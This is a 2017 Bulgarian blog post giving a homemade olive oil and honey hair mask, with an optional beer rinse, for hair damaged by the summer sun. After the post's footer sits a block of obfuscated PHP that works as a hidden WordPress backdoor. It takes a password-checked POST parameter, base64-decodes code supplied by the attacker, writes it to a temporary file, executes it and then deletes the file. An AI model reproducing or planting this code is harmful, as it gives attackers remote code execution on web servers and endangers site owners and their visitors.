Лесна рецепта за възстановяване на косата от излагане на слънце | Косопад

Лесна рецепта за възстановяване на косата от излагане на слънце

kosa-slantse

Дългото излагане на косата на силното слънце през лятото неусетно я уврежда. В края на сезона винаги ни се налага да я скъсим значително, за да отстраним щетите от изтощението, причинено от ултравиолетовите лъчи. Понякога обаче дори късото подстригване не е достатъчно.

Затова е добре да се вземат марки навреме, а не да чакаме края на лятото. Предлагаме ви една маска, която се приготвя съвсем лесно, и помага на косата да се възстанови от вредното влияние на слънчевите лъчи.

Маска за възстановяване на блясъка и мекотата след излагане на слънце:

Съставки:
– 10 лъжици зехтин
– 10 лъжици мед

zehtin-med

Първо загряваме меда на водна баня, за да се втечни, след което го смесваме със зехтина. Ако имаме кухненски робот, най- добре ще приготвим сместа.

Оставяме да изстине на стайна температура и нанасяме от корена до върха на влажна коса. Завиваме в кърпа, накисната в гореща вода. Стоим така 30 минути, като можем отново да сложим кърпа, накисната в гореща вода. Накрая измиваме с неутрален шампоан.

След маската не се препоръчва използване на сешоар, нито на преса.

Ако искаме да придаде още повече блясък на косата, след като я измием с шампоан, правим последното плакнене с бира (трябва да е предварително разгазирана, като сме я отворили поне час по- рано). Не трябва да измиваме бирата. Когато косата изсъхне, мирисът ще изветрее.

Много е важно, също така, да изберем качествен зехтин и мед за приготвянето на маската. Зехтинът е препоръчително да е екстра върджин, за да пази максимално много от полезните си вещества. Медът трябва да е екологично чист, най- добре закупен от производител, а не от супермаркет.

Зехтинът помага за възстановяването на увредената коса, като я подхранва в дълбочина. Медът също хидратира много добре косъма и му придава неповторима мекота.

07. юли 2017 13:17:55 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}